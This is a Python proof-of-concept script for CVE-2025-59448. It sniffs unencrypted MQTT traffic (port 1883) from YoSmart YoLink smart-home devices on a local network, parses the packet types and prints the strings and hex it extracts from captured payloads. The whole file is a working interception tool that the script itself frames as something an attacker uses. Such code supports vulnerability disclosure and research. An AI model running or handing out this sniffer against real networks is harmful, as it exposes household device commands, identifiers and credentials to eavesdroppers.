#!/usr/bin/env python3
# CVE-2025-59448 - YoSmart YoLink Unencrypted MQTT Sniffing PoC
# This PoC demonstrates how an attacker can sniff unencrypted MQTT traffic
# from the YoSmart YoLink ecosystem on a local network.
import socket
import struct
import sys
import argparse
from datetime import datetime
try:
from scapy.all import sniff, TCP, Raw
except ImportError:
print("[-] scapy is required. Install with: pip install scapy")
sys.exit(1)
def parse_mqtt_packet(data):
"""Parse MQTT fixed header from raw bytes."""
if len(data) < 2:
return None
packet_type = (data[0] >> 4) & 0x0F
flags = data[0] & 0x0F
remaining_length = data[1]
type_names = {
1: "CONNECT", 2: "CONNACK", 3: "PUBLISH",
4: "PUBACK", 5: "PUBREC", 6: "PUBREL",
7: "PUBCOMP", 8: "SUBSCRIBE", 9: "SUBACK",
10: "UNSUBSCRIBE", 11: "UNSUBACK",
12: "PINGREQ", 13: "PINGRESP", 14: "DISCONNECT"
}
return type_names.get(packet_type, f"UNKNOWN({packet_type})")
def extract_strings(data, min_length=4):
"""Extract printable strings from binary data."""
result = []
current = []
for byte in data:
if 32 <= byte <= 126:
current.append(chr(byte))
else:
if len(current) >= min_length:
result.append(''.join(current))
current = []
if len(current) >= min_length:
result.append(''.join(current))
return result
def packet_callback(packet):
"""Callback for each captured packet on MQTT port (1883)."""
if packet.haslayer(TCP) and packet.haslayer(Raw):
tcp_layer = packet[TCP]
if tcp_layer.dport == 1883 or tcp_layer.sport == 1883:
payload = bytes(packet[Raw].load)
mqtt_type = parse_mqtt_packet(payload)
timestamp = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
src = f"{packet[0][1].src}:{tcp_layer.sport}"
dst = f"{packet[0][1].dst}:{tcp_layer.dport}"
print(f"\n[{timestamp}] MQTT {mqtt_type} | {src} -> {dst}")
strings = extract_strings(payload)
if strings:
print(f" Extracted data: {strings[:10]}")
print(f" Raw hex: {payload.hex()[:200]}")
def main():
parser = argparse.ArgumentParser(
description="CVE-2025-59448 PoC - Sniff YoSmart YoLink unencrypted MQTT traffic"
)
parser.add_argument("-i", "--interface", default=None,
help="Network interface to sniff on")
parser.add_argument("-f", "--filter", default="tcp port 1883",
help="BPF filter (default: tcp port 1883)")
parser.add_argument("-c", "--count", type=int, default=0,
help="Number of packets to capture (0=infinite)")
args = parser.parse_args()
print("=" * 60)
print("CVE-2025-59448 - YoSmart YoLink MQTT Sniffer PoC")
print("=" * 60)
print(f"[*] Interface: {args.interface or 'default'}")
print(f"[*] Filter: {args.filter}")
print("[*] Waiting for MQTT traffic (Ctrl+C to stop)...\n")
try:
sniff(iface=args.interface, filter=args.filter,
prn=packet_callback, count=args.count, store=0)
except KeyboardInterrupt:
print("\n[*] Stopped by user.")
except PermissionError:
print("[-] Permission denied. Run with sudo/Administrator privileges.")
sys.exit(1)
if __name__ == "__main__":
main()